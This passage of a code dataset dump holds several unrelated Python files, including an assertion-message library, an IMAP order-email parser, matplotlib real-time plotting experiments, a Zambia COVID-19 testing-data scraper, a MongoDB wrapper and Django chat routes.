left, right)), _operator)\n )\n left = right\n return result\n\n def visit_Attribute(self, node):\n value = self.visit(node.value)\n self.nodes.append((value, node))\n res = getattr(value, node.attr)\n self.nodes.append((self.FuncResult(res), node))\n return res\n\n def visit_Call(self, node):\n if isinstance(node.func, ast.Name):\n name = node.func.id\n else:\n name = self.visit(node.func)\n\n if callable(name):\n func = name\n elif name in self.f_locals:\n func = self.f_locals[name]\n elif name in self.f_globals:\n func = self.f_globals[name]\n elif getattr(builtins, name):\n func = getattr(builtins, name)\n else:\n raise NameError(\n \"Function '{}' is not defined\".format(name),\n node.lineno,\n node.col_offset,\n )\n\n if isinstance(func, values):\n if func.stack:\n result = func.stack.pop(0)\n else:\n result = None\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n starred = []\n args = []\n for arg in node.args:\n if isinstance(arg, ast.AST):\n arg_value = self.visit(arg)\n if not isinstance(arg, self._simple):\n self.nodes.append((arg_value, arg))\n args.append(arg_value)\n\n if args and isinstance(args[-1], ast.Starred):\n starred = args.pop(-1).value\n\n keywords = {}\n for keyword in node.keywords:\n keyword_value = self.visit(keyword.value)\n keywords[keyword.arg] = keyword_value\n if not isinstance(keyword.value, self._simple):\n self.nodes.append((keyword_value, keyword.value))\n\n value = func(*args, *starred, **keywords)\n self.nodes.append((self.FuncResult(value), node))\n return value\n\n def visit_Starred(self, node):\n result = self.visit(node.value)\n return ast.Starred(result, node.ctx)\n\n def visit_BinOp(self, node):\n op = type(node.op)\n func = self._binary_ops[op]\n left = self.visit(node.left)\n if not isinstance(node.left, self._simple):\n self.nodes.append((left, node.left))\n right = self.visit(node.right)\n if not isinstance(node.right, self._simple):\n self.nodes.append((right, node.right))\n result = func(left, right)\n _operator = copy.copy(node.op)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, node.right.lineno, node.right.col_offset\n )\n self.nodes.append((self.FuncResult(result), _operator))\n return result\n\n def visit_UnaryOp(self, node):\n op = type(node.op)\n func = self._unary_ops[op]\n operand = self.visit(node.operand)\n if not isinstance(node.operand, self._simple):\n self.nodes.append((operand, node.operand))\n result = 
func(operand)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_IfExp(self, node):\n body = self.visit(node.body)\n if not isinstance(node.body, self._simple):\n self.nodes.append((body, node.body))\n test = self.visit(node.test)\n if not isinstance(node.test, self._simple):\n self.nodes.append((test, node.test))\n orelse = self.visit(node.orelse)\n if not isinstance(node.orelse, self._simple):\n self.nodes.append((orelse, node.orelse))\n result = body if test else orelse\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_BoolOp(self, node):\n op = type(node.op)\n operator = node.op\n func = self._boolean_ops[op]\n\n left = self.visit(node.values[0])\n if not isinstance(node.values[0], self._simple):\n self.nodes.append((left, node.values[0]))\n\n for value in node.values[1:]:\n right = self.visit(value)\n if not isinstance(value, self._simple):\n self.nodes.append((right, value))\n result = func(left, right)\n _operator = copy.copy(operator)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, value.lineno, value.col_offset\n )\n self.nodes.append((self.FuncResult(result), _operator))\n left = result\n return result\n\n def visit_Tuple(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n result = tuple(result)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_Set(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n result = set(result)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_List(self, node):\n result = []\n for e in node.elts:\n v = self.visit(e)\n if not isinstance(e, self._simple):\n self.nodes.append((v, e))\n result.append(v)\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def visit_Dict(self, node):\n keys = []\n for k in node.keys:\n v = self.visit(k)\n if not isinstance(k, self._simple):\n self.nodes.append((v, k))\n keys.append(v)\n values = []\n for value in node.values:\n v = self.visit(value)\n if not isinstance(value, self._simple):\n self.nodes.append((v, value))\n values.append(v)\n result = dict(zip(keys, values))\n self.nodes.append((self.FuncResult(result), node))\n return result\n\n def generic_visit(self, node):\n # some expressions like comprehensions will have their\n # own local scope so therefore we combine globals and locals\n # scopes into one globals scope\n f_globals = self.f_globals.copy()\n f_globals.update(self.f_locals)\n if isinstance(node, ast.expr):\n bytecode = compile(ast.Expression(node), \"assertion node\", \"eval\")\n return eval(bytecode, f_globals)\n elif isinstance(node, ast.stmt):\n bytecode = compile(ast.Module([node]), \"assertion node\", \"exec\")\n return exec(bytecode, f_globals)\n return super(AssertEval, self).generic_visit(node)\n\n\ndef _code_block(filename, lineno, before=8, after=4):\n \"\"\"Retrieve code blocks around a given line\n inside the source.\n\n :param filename: name of the source file\n :param lineno: line number\n :param before: number of lines before the line number\n :param after: number of line after the line number\n \"\"\"\n min_n = max(lineno - before, 0)\n max_n = lineno + after\n\n line_fmt = \"%\" + str(len(str(max_n))) + \"d| %s\"\n lines = []\n\n for n in range(min_n, max_n):\n line = linecache.getline(filename, n)\n if n > min_n 
and len(line) == 0:\n break\n print_line = line_fmt % (n, line)\n if n == lineno:\n print_line = \"|> \".join(print_line.split(\"| \", 1))\n lines.append(print_line)\n\n return lines\n\n\nclass error(object):\n \"\"\"Error object that generates a descriptive\n error message when assert fails.\n\n :param desc: description, default: `None`\n :param frame: frame, default: `None`\n :param frame_info: frame info, default: `None`\n :param expression: expression, default: `None`\n :param nodes: a list of expression value nodes, default: `None`\n :param expression_section: a flag to include an expression section\n that lists the assert expression, default: `True`\n :param description_section: a flag to include a description section\n that shows custom description message, default: `True`\n :param values_section: a flag to include a values section\n that shows the values of the assert expression, default: `True`\n :param where_section: a flag to include a where section\n that shows source code where assert expression is found, default: `True`\n \"\"\"\n\n def __init__(\n self,\n desc=None,\n frame=None,\n frame_info=None,\n expression=None,\n nodes=None,\n expression_section=True,\n description_section=True,\n values_section=True,\n where_section=True,\n ):\n self.frame = frame\n if self.frame is None:\n self.frame = inspect.currentframe().f_back\n self.frame_info = frame_info\n if self.frame_info is None:\n self.frame_info = inspect.getframeinfo(self.frame)\n self.desc = str(desc) if desc is not None else None\n self.nodes = list(nodes) if nodes is not None else None\n self.expression = str(expression) if expression is not None else None\n self.expression_section = expression_section\n self.description_section = description_section\n self.values_section = values_section\n self.where_section = where_section\n self.message = self.generate()\n\n def __str__(self):\n return self.message\n\n def generate(self):\n \"\"\"Re-evaluate assertion statement and\n generate an error message.\n \"\"\"\n if self.nodes is None:\n self.expression, self.nodes = AssertEval(self.frame, self.frame_info).eval()\n return self.generate_message()\n\n def generate_expression_section(self):\n \"\"\"Return expression section.\"\"\"\n section = \"\"\n if self.expression_section and self.expression:\n section += \"\\n\\nThe following assertion was not satisfied\"\n for line in self.expression:\n section += \"\\n \" + line\n return section\n\n def generate_description_section(self):\n \"\"\"Return description section.\"\"\"\n section = \"\"\n if self.description_section and self.desc:\n section += \"\\n\\nDescription\"\n section += \"\\n \" + self.desc[0].capitalize() + self.desc[1:]\n return section\n\n def generate_values_section(self):\n \"\"\"Return values section.\"\"\"\n section = \"\"\n if self.values_section and self.nodes:\n section += \"\\n\\nAssertion values\"\n for v, n in self.nodes:\n for i, line in enumerate(self.expression):\n section += \"\\n \" + line\n if n.lineno == i + 1:\n col_offset = n.col_offset\n if col_offset < 0:\n col_offset = len(line) - len(line.lstrip())\n section += \"\\n \" + \" \" * col_offset + \"^ is \" + _saferepr(v)\n return section\n\n def generate_where_section(self):\n \"\"\"Return where section.\"\"\"\n section = \"\"\n if self.where_section and self.frame_info.code_context:\n section += \"\\n\\nWhere\"\n section += \"\\n File '%s', line %d in '%s'\" % (\n self.frame_info.filename,\n self.frame_info.lineno,\n self.frame_info.function,\n )\n\n section += \"\\n\\n\" + \"\".join(\n 
self.code_block(self.frame_info.filename, self.frame_info.lineno)\n )\n return section\n\n def generate_message(self):\n \"\"\"Generate an error message.\n\n :param expression: expression\n :param frame_info: frame info\n \"\"\"\n message = \"Oops! Assertion failed\"\n message += self.generate_expression_section()\n message += self.generate_description_section()\n message += self.generate_values_section()\n message += self.generate_where_section()\n return message\n\n def code_block(self, filename, lineno, before=8, after=4):\n \"\"\"Retrieve code blocks around a given line\n inside the source.\n\n :param filename: name of the source file\n :param lineno: line number\n :param before: number of lines before the line number\n :param after: number of line after the line number\n \"\"\"\n min_n = max(lineno - before, 1)\n max_n = lineno + after\n\n line_fmt = \"%\" + str(len(str(max_n))) + \"d| %s\"\n lines = []\n\n for n in range(min_n, max_n):\n line = linecache.getline(filename, n)\n if n > min_n and len(line) == 0:\n break\n print_line = line_fmt % (n, line)\n if n == lineno:\n print_line = \"|> \".join(print_line.split(\"| \", 1))\n lines.append(print_line)\n\n return lines\n\n\nclass errors(object):\n \"\"\"Context manager that can be used\n to wrap multiple assert statements.\n \"\"\"\n\n class softerror(object):\n \"\"\"Context manager that is used\n to wrap soft assertion.\n\n :param errors: list to which an exception will be added\n \"\"\"\n\n def __init__(self, errors):\n self.errors = errors\n\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if isinstance(exc_val, AssertionError):\n frame = inspect.currentframe().f_back\n frame_info = inspect.getinnerframes(exc_tb)[-1]\n desc = None\n if exc_val.args:\n if isinstance(exc_val.args[0], error):\n return\n desc = str(exc_val)\n exc_val.args = (error(desc=desc, frame=frame, frame_info=frame_info),)\n self.errors.append(exc_val)\n return True\n\n def __init__(\n self,\n expression_section=True,\n description_section=True,\n values_section=True,\n where_section=True,\n ):\n self.errors = []\n self.expression_section = expression_section\n self.description_section = description_section\n self.values_section = values_section\n self.where_section = where_section\n\n def __str__(self):\n errs = []\n for err in self.errors:\n err = err.args[0]\n err.expression_section = self.expression_section\n err.description_section = self.description_section\n err.values_section = self.values_section\n err.where_section = self.where_section\n errs.append(err.generate_message())\n return \"\\n\\nas well as the following assertion\\n\\n\".join(errs)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if isinstance(exc_val, AssertionError):\n frame = inspect.currentframe().f_back\n frame_info = inspect.getinnerframes(exc_tb)[-1]\n desc = None\n if exc_val.args:\n if isinstance(exc_val.args[0], error):\n return\n desc = str(exc_val)\n exc_val.args = (error(desc=desc, frame=frame, frame_info=frame_info),)\n if self.errors:\n self.errors.append(exc_val)\n elif isinstance(exc_val, Exception):\n return\n\n if self.errors:\n raise AssertionError(self) from None\n\n def error(self):\n \"\"\"Return an instance of the soft\n error context manager.\n \"\"\"\n return self.softerror(self.errors)\n\n\ndef _saferepr(value):\n try:\n r = textwrap.indent(repr(value), \" \" * 2)\n return r.lstrip()\n except Exception as e:\n return \" (repr() failed with '%s')\" % 
str(e)\n","sub_path":"testflows/asserts/asserts.py","file_name":"asserts.py","file_ext":"py","file_size_in_byte":25290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"343024977","text":"import imapclient, pyzmail\n\nclass email_scr: \n\n def __init__(self):\n self.Client_Name = \"\"\n self.Order_No = 0\n self.Shipping_No = 0\n self.Order_info = []\n self.Order_Details = \"\"\n self.Customer_email = \"\"\n self.Shipping_Details = \"\"\n self.Delivery_Meth = \"\"\n\n def toString(self):\n return str(\n \"Client Name: \" + self.Client_Name + \"\\n\"\n \"Order Number: \" + str(self.Order_No) + \"\\n\"\n \"Order Details: \" + self.Order_Details + \"\\n\" \n \"Shipping Number: \" + str(self.Shipping_No) + \"\\n\"\n \"Shipping Details: \" + self.Shipping_Details)\n\n def totup(self): \n email_tup = (self.Client_Name, self.Order_No, self.Order_Details, self.Shipping_No, self.Shipping_Details)\n return email_tup\n\n def parse_email(self, text_message):\n for i, line in enumerate(text_message):\n if line == 'ORDER INFORMATION\\r':\n self.Order_info.append(text_message[i:i+15])\n elif line == 'Order #:':\n self.Order_No = text_message[i+1]\n\n\n def login(self,email_val):\n email_reader = imapclient.IMAPClient('imap.gmail.com', ssl=True)\n email_reader.login( \"admin@nah.com\" , \"nmope\")\n\n email_reader.select_folder('INBOX', readonly=True)\n \n \n UIDs = email_reader.search(['SINCE','24-Apr-2020'])\n rawMessages = email_reader.fetch(UIDs, ['BODY[]'])\n message = pyzmail.PyzMessage.factory(rawMessages[UIDs[email_val]][b'BODY[]'])\n if message.get_subject() == 'NICE! YOU JUST GOT AN ORDER':\n message_text = message.text_part.get_payload().decode(message.text_part.charset)\n text_list = message_text.split('\\n')\n print(text_list)\n return self.parse_email(text_list)\n\n else:\n return 'done'\n","sub_path":"python/email_app/email_scr.py","file_name":"email_scr.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"433350070","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 03/04/2016\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\n__author__ = 'Nathan Starkweather'\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nimport matplotlib.pyplot as plt\nimport matplotlib.figure\nimport matplotlib.animation as anim\nimport numpy as np\n\n\ndef main():\n f = plt.figure()\n ax = f.add_subplot(1, 1, 1)\n x_data = np.arange(2*np.pi, step=2*np.pi / 100)\n sin_arg = x_data\n print(sin_arg)\n y_data = np.sin(sin_arg)\n line = ax.plot(x_data, y_data)[0]\n # f.show()\n i = 0\n # plt.show(False)\n # plt.draw()\n bkgd = f.canvas.copy_from_bbox(ax.bbox)\n from time import sleep, time\n f.show()\n start = time()\n for i in range(1000):\n x = x_data * i / 2\n y = np.sin(x)\n # print(x)\n line.set_data(x_data, y)\n f.canvas.restore_region(bkgd)\n f.draw_artist(ax)\n f.canvas.blit(ax.bbox)\n f.canvas.flush_events()\n end = time()\n print(\"FPS: %s\" % (1000 / (end - start)))\nfrom math import sin\n\nimport itertools\n\ndef iterdata():\n step = np.pi / 100\n xi = itertools.cycle(i * step for i in range(1000))\n while True:\n x = next(xi)\n y = sin(x)\n yield x, y\n\n\nimport collections\nimport threading\nfrom time import sleep\n\n\nclass SimpleRTPlot():\n \"\"\" Simple interface to a real-time plot based on matplotlib.\n Intended primarily as a learning tool to understand the basics of matplotlib.\n Extensive comments may be used as a result.\n \"\"\"\n\n def __init__(self, x_data=(), y_data=(), max_pts=None, 
style='ggplot'):\n\n # plots expect data to be np arrays\n # but np arrays can't be appended to\n # resulting in O(n^2) behavior\n # so store data python objects instead.\n\n # deque is used to more easily and efficiently\n # work with arbitrary limits on the total number\n # of data points\n\n # data is stored in separate containers for x and y\n # data, because that's how the plotting interface\n # works.\n\n x_data = collections.deque(x_data, max_pts)\n y_data = collections.deque(y_data, max_pts)\n\n self.x_data = x_data\n self.y_data = y_data\n self.max_pts = max_pts\n self.style = style\n\n self.clear_pyplot()\n\n self.data_lock = threading.RLock()\n self.pyplot_lock = threading.RLock()\n self.setup_complete = threading.Event()\n self.shutdown_complete = threading.Event()\n self.new_data = False\n self.stop_loop = False\n self.plot_thread = None\n self._init()\n\n def _init(self):\n self.thread_target = self.threadloop\n\n def clear_pyplot(self):\n self.figure = None\n self.subplot = None\n self.background = None\n self.line = None\n\n def setup_pyplot(self):\n plt.style.use(self.style)\n\n num = None\n figsize = None\n dpi = None\n facecolor = None\n edgecolor = None\n frameon = True\n fig_klass = matplotlib.figure.Figure\n\n # self.figure = plt.figure(num, figsize, dpi, facecolor, edgecolor, frameon, fig_klass)\n self.figure = plt.figure()\n self.subplot = self.figure.add_subplot(1, 1, 1)\n self.line, = self.subplot.plot(self.x_data, self.y_data)\n self.background = self.figure.canvas.copy_from_bbox(self.subplot.bbox)\n self.figure.show()\n # self.figure.draw()\n\n def show(self):\n self.clear_pyplot()\n self.setup_complete.clear()\n self.shutdown_complete.clear()\n\n self.plot_thread = threading.Thread(None, self.thread_target, daemon=True)\n self.plot_thread.start()\n self.setup_complete.wait()\n\n def add_data(self, x, y):\n with self.data_lock:\n self.x_data.append(x)\n self.y_data.append(y)\n self.notify_new_data()\n\n def notify_new_data(self):\n self.new_data = True\n\n def stop(self):\n self._shutdown_loop()\n self.shutdown_complete.wait()\n self.shutdown_complete.clear()\n self.setup_complete.clear()\n\n def _shutdown_loop(self):\n self.stop_loop = True\n self.plot_thread.join()\n self.plot_thread = None\n\n def extend_data(self, x_data, y_data):\n if len(x_data) != len(y_data):\n raise ValueError(\"Data must have same length!\")\n with self.data_lock:\n self.x_data.extend(x_data)\n self.y_data.extend(y_data)\n self.notify_new_data()\n\n def threadloop(self):\n self.setup_pyplot()\n self.setup_complete.set()\n while not self.stop_loop:\n with self.data_lock:\n if self.new_data:\n with self.pyplot_lock:\n self.new_data = False\n self.line.set_data(self.x_data, self.y_data)\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n self.figure.canvas.blit(self.subplot.bbox)\n self.subplot.autoscale_view()\n self.figure.canvas.flush_events()\n sleep(0.01)\n self.clear_pyplot()\n self.shutdown_complete.set()\n\n\nclass SimpleRTPlot2(SimpleRTPlot):\n\n def _init(self):\n self.thread_target = self._threadloop2\n\n def notify_new_data(self):\n self.figure.canvas.stop_event_loop()\n\n def _shutdown_loop(self):\n self.stop_loop = True\n self.figure.canvas.stop_event_loop()\n self.plot_thread.join()\n self.plot_thread = None\n\n def _threadloop2(self):\n self.setup_pyplot()\n # start with event loop running\n self.figure.canvas.start_event_loop(1)\n\n while not self.stop_loop:\n with self.data_lock:\n self.line.set_data(self.x_data, self.y_data)\n 
with self.pyplot_lock:\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n self.figure.canvas.blit(self.subplot.bbox)\n self.subplot.autoscale_view()\n self.figure.canvas.start_event_loop(1)\n self.clear_pyplot()\n\n\nfrom tkinter import TclError\nfrom time import time\n\n\nclass SimpleRTPlot3(SimpleRTPlot):\n def show(self):\n self.setup_pyplot()\n self.last_update = time()\n def flush(flushfunc):\n while True:\n flushfunc()\n threading.Thread(None, flush, None, (self.figure.canvas.flush_events,), daemon=True).start()\n\n def notify_new_data(self):\n self.line.set_data(self.x_data, self.y_data)\n self.figure.canvas.restore_region(self.background)\n self.figure.draw_artist(self.subplot)\n try:\n self.figure.canvas.blit(self.subplot.bbox)\n except TclError:\n return\n # if time() - self.last_update > 1:\n # self.figure.canvas.flush_events()\n # self.last_update = time()\n\n\ndef main2():\n\n plot = SimpleRTPlot3(max_pts=20)\n data = iterdata()\n plot.show()\n plot.subplot.set_ylim(-1, 1, True)\n plot.subplot.set_xlim(0, np.pi * 5, True)\n frames = 0\n start = time()\n while True:\n x, y = next(data)\n plot.add_data(x, y)\n frames += 1\n print(\"\\rFPS: %s\" % (frames / (time() - start)), end=\"\")\n\n\n\nif __name__ == '__main__':\n # main2()\n pass\n","sub_path":"archive/toys/plot_stuff.py","file_name":"plot_stuff.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"325775645","text":"import pickle\nimport pandas as pd\n\n\n\n\ndef load_models(log_writer,file_object):\n log_writer.log(file_object, 'Starting to load models')\n with open(\"models/modelForPrediction.sav\", 'rb') as f:\n model = pickle.load(f)\n return model\n\ndef preprocess_data(final_df, log_writer,file_object):\n gender = {'male': 0, 'female': 1}\n final_df.Sex = [gender[item] for item in final_df.Sex]\n log_writer.log(file_object, 'Converted Sex to numeric values')\n return final_df\n\n\ndef predict_data(dict_pred, log_writer):\n\n #validate the data entered\n #preprocess to get X in the same format\n #then apply models to predict\n file_object = open(\"logs/PredictionLogs.txt\", 'a+')\n log_writer.log(file_object, 'Starting the predict data')\n\n model = load_models(log_writer,file_object)\n log_writer.log(file_object, 'Loading of models completed')\n final_df = pd.DataFrame(dict_pred, index = [1,])\n final_df = preprocess_data(final_df, log_writer,file_object)\n log_writer.log(file_object, 'Prepared the final dataframe')\n log_writer.log(file_object, 'Predicting the result')\n predict = model.predict(final_df)\n\n print('Class is: ', predict[0])\n log_writer.log(file_object, 'Prediction completed')\n log_writer.log(file_object, '=================================================')\n return predict[0]\n\n\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"494597076","text":"from motor.motor_asyncio import AsyncIOMotorClient, AsyncIOMotorDatabase, AsyncIOMotorCollection\nfrom bson.objectid import ObjectId\nfrom mongo.models import Result, Counter\n\n\nclass AsyncDatabase:\n client: AsyncIOMotorClient = None\n database: AsyncIOMotorDatabase = None\n counters_collection: AsyncIOMotorCollection = None\n results_collection: AsyncIOMotorCollection = None\n\n def __init__(self, connection_uri: str, database_name: str):\n self.connection_uri = 
connection_uri\n self.database_name = database_name\n\n def connect_to_database(self):\n self.client = AsyncIOMotorClient(self.connection_uri)\n self.database = self.client[self.database_name]\n self.counters_collection = self.database.get_collection('counters')\n self.results_collection = self.database.get_collection('results')\n\n def close_database_connection(self):\n self.database.close()\n\n async def add_counter(self, counter: Counter) -> Counter:\n resp = await self.counters_collection.insert_one(counter.dict())\n counter.id = resp.inserted_id\n return counter\n\n async def get_results(self, counter_id: str, time_from: int, time_to: int, with_top: bool = False) -> list:\n if ObjectId.is_valid(counter_id):\n query = {\n 'counter_id': counter_id,\n 'timestamp': {'$gte': time_from, '$lte': time_to}\n }\n projection = {\n '_id': 0,\n 'counter_id': 0,\n 'top_ads': 0\n }\n\n if with_top:\n projection.pop('top_ads')\n\n results = []\n async for result in self.results_collection.find(query, projection):\n results.append(result)\n return results\n return []\n","sub_path":"src/mongo/async_database.py","file_name":"async_database.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"333290043","text":"from django.conf.urls import url\n\nfrom . import views\napp_name = 'chat'\n\n\nurlpatterns = [\n url(r'^chat/$', views.Talk, name='chat'),\n\n url(r'^post/$', views.Post, name='post'),\n url(r'^messages/$', views.Messages, name='messages'),\n]","sub_path":"webapp/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"416450650","text":"\"\"\"Constructs daily time series of COVID-19 testing data for Zambia.\nArcGIS Dashboard: https://zambia-open-data-nsdi-mlnr.hub.arcgis.com/pages/zambia-covid19\n\"\"\"\n\nimport re\nimport json\nimport datetime\nimport requests\nimport pandas as pd\n\nCOUNTRY = 'Zambia'\nUNITS = 'tests performed'\nTESTING_TYPE = 'PCR only'\nSOURCE_LABEL = 'Government of Zambia'\nSOURCE_URL = 'https://zambia-open-data-nsdi-mlnr.hub.arcgis.com/pages/zambia-covid19'\nDATA_URL = 'https://services9.arcgis.com/ZNWWwa7zEkUIYLEA/arcgis/rest/services/service_d73fa15b0b304945a52e048ed42028a9/FeatureServer/0/query'\nPARAMS = {\n 'f': 'json',\n 'where': \"reportdt>=timestamp '2020-01-01 00:00:00'\",\n 'returnGeometry': False,\n 'spatialRel': 'esriSpatialRelIntersects',\n 'outFields': '*',\n 'orderByFields': 'reportdt asc',\n 'resultOffset': 0,\n 'resultRecordCount': 32000,\n 'resultType': 'standard',\n 'cacheHint': True,\n}\n\n# sample of official values for cross-checking against the API data.\nofficial_cumulative_totals = [\n (\"2020-09-03\", {\"cumulative_total\": 119567, \"source\": \"https://twitter.com/mohzambia/status/1301477446936678400\"}),\n (\"2020-08-08\", {\"cumulative_total\": 93344, \"source\": \"https://twitter.com/mohzambia/status/1292086483978014722\"}),\n (\"2020-08-06\", {\"cumulative_total\": 90307, \"source\": \"https://twitter.com/mohzambia/status/1291398767959322629\"}),\n (\"2020-07-30\", {\"cumulative_total\": 81482, \"source\": \"https://www.facebook.com/mohzambia/posts/1656823021159015\"}),\n (\"2020-07-29\", {\"cumulative_total\": 80239, \"source\": \"https://www.facebook.com/mohzambia/posts/1655960864578564\"}),\n (\"2020-07-28\", {\"cumulative_total\": 79269, \"source\": \"https://www.facebook.com/mohzambia/posts/1654985441342773\"}),\n 
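The AsyncDatabase class above wraps Motor collections for async insert and projected queries. A minimal sketch of the same insert/find-with-projection pattern; the URI, database, and document fields are placeholders, and a reachable MongoDB instance is assumed:

import asyncio
from motor.motor_asyncio import AsyncIOMotorClient

async def demo():
    client = AsyncIOMotorClient("mongodb://localhost:27017")   # placeholder URI
    results = client["demo_db"]["results"]
    await results.insert_one({"counter_id": "c1", "timestamp": 100, "count": 5})
    # a projection with '_id': 0 strips the ObjectId, as get_results does
    async for doc in results.find({"timestamp": {"$gte": 0}}, {"_id": 0}):
        print(doc)

asyncio.run(demo())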
(\"2020-05-07\", {\"cumulative_total\": 11412, \"source\": \"https://twitter.com/mohzambia/status/1258424347011756033\"}),\n (\"2020-04-30\", {\"cumulative_total\": 6828, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/05/Zambia_COVID-Situational-Report-No-43_30April20_Final.pdf\"}),\n (\"2020-04-09\", {\"cumulative_total\": 1314, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-22_09April20_Final.pdf\"}),\n (\"2020-04-08\", {\"cumulative_total\": 1222, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-21_08April20_Final.pdf\"}),\n (\"2020-04-07\", {\"cumulative_total\": 1087, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-20_07April20_Final.pdf\"}),\n (\"2020-03-31\", {\"cumulative_total\": 520, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/04/Zambia_COVID-Situational-Report-No-13_310320_Final.pdf\"}),\n (\"2020-03-22\", {\"cumulative_total\": 75, \"source\": \"http://znphi.co.zm/news/wp-content/uploads/2020/03/Zambia_COVID-Situational-Report-No-4_220320_final.pdf\"}),\n]\n\ndef main() -> None:\n df = get_data()\n df = df.sort_values('Date')\n df['Country'] = COUNTRY\n df['Units'] = UNITS\n df['Testing type'] = TESTING_TYPE\n df['Source URL'] = SOURCE_URL\n df['Source label'] = SOURCE_LABEL\n df['Notes'] = \"\"\n sanity_checks(df)\n df = df[['Country', 'Units', 'Testing type', 'Date', 'Cumulative total', 'Source URL', 'Source label', 'Notes']]\n df.to_csv(\"automated_sheets/Zambia.csv\", index=False)\n\ndef get_data() -> pd.DataFrame:\n res = requests.get(DATA_URL, params=PARAMS)\n assert res.ok\n json_data = json.loads(res.text)\n df = pd.DataFrame([feat['attributes'] for feat in json_data['features']])\n df['reportdt'] = df['reportdt'].astype(int).apply(lambda dt: datetime.datetime.utcfromtimestamp(dt/1000))\n df = df.rename(columns={'totalTests': 'Cumulative total'})\n df['Cumulative total'] = df['Cumulative total'].astype(int)\n # KLUDGE: there are a few days with two reports on the same day (but at \n # different times, like 10am vs 10pm). Upon inspection, it appears that the \n # latter reports (e.g. the 10pm reports) actually correspond to official cumulative\n # totals for the subsequent day (as determined by comparing to official updates\n # published on Twitter and Facebook). 
So I increment the date of these latter \n # reports by one.\n df = df.sort_values('reportdt')\n duplicate_idx = df.index[df['reportdt'].dt.date.duplicated(keep='first')]\n # df.loc[df['reportdt'].dt.date.duplicated(keep=False), ['reportdt', 'Cumulative total', 'test24hours']]\n for idx in duplicate_idx:\n df.loc[idx, 'reportdt'] = df.loc[idx, 'reportdt'] + datetime.timedelta(days=1)\n df['Date'] = df['reportdt'].dt.strftime('%Y-%m-%d')\n # df.loc[df['Date'].duplicated(keep=False), ['Date', 'reportdt', 'Cumulative total', 'test24hours']]\n # df.loc[(df['Date'] >= '2020-08-06') & (df['Date'] <= '2020-08-09'), ['Date', 'reportdt', 'Cumulative total', 'test24hours']]\n df = df[['Date', 'Cumulative total']]\n df = df[df[\"Cumulative total\"] > 0]\n df = df.groupby(\"Cumulative total\", as_index=False).min()\n df = df.groupby(\"Date\", as_index=False).min()\n return df\n\ndef sanity_checks(df: pd.DataFrame) -> None:\n \"\"\"checks that there are no obvious errors in the scraped data.\n \"\"\"\n # checks that there are no duplicate dates\n assert df['Date'].duplicated().sum() == 0, 'One or more rows have a duplicate date.'\n # checks that the cumulative number of tests on date t is always greater than the figure for t-1:\n assert (df['Cumulative total'].iloc[1:] >= df['Cumulative total'].shift(1).iloc[1:]).all(), \"On one or more dates, `Cumulative total` is greater on date t-1.\"\n # cross-checks a sample of scraped figures against the expected result.\n assert len(official_cumulative_totals) > 0\n for dt, d in official_cumulative_totals:\n val = df.loc[df['Date'] == dt, 'Cumulative total'].squeeze().sum()\n assert val == d['cumulative_total'], f\"scraped value ({val:,d}) != official value ({d['cumulative_total']:,d}) on {dt}\"\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/scripts/testing/automations/zambia.py","file_name":"zambia.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469854227","text":"'''\nquick and dirty C API wrappers\n- basic error checking, memory cleanups, and type inference\n- imperative interface, still receives pointer object\n- this sub-module shall be easily portable to C, allowing future speedups\n'''\nfrom ctypes import *\nimport codecs\n\nfrom .wsdefs import *\nfrom . import naked\n\n# ==== utils\nclass BaseWSTPError(RuntimeError):\n def __init__(self, errno_, msg=''):\n '''\n Args:\n errno_: int\n msg: str\n '''\n self.errno = errno_\n self.msg = msg\n\n def __repr__(self):\n if self.msg:\n return '%s(%d, \"%s\")' % (\n type(self).__name__, self.errno, self.msg)\n else:\n return '%s(%d)' % (type(self).__name__, self.errno)\n\n def __str__(self):\n return self.__repr__()\n\nclass WSTPError(BaseWSTPError):\n '''\n Contains WSTP error code, and optionally a message\n\n For this class, error code should be one of WSE* from wstp.h\n '''\n 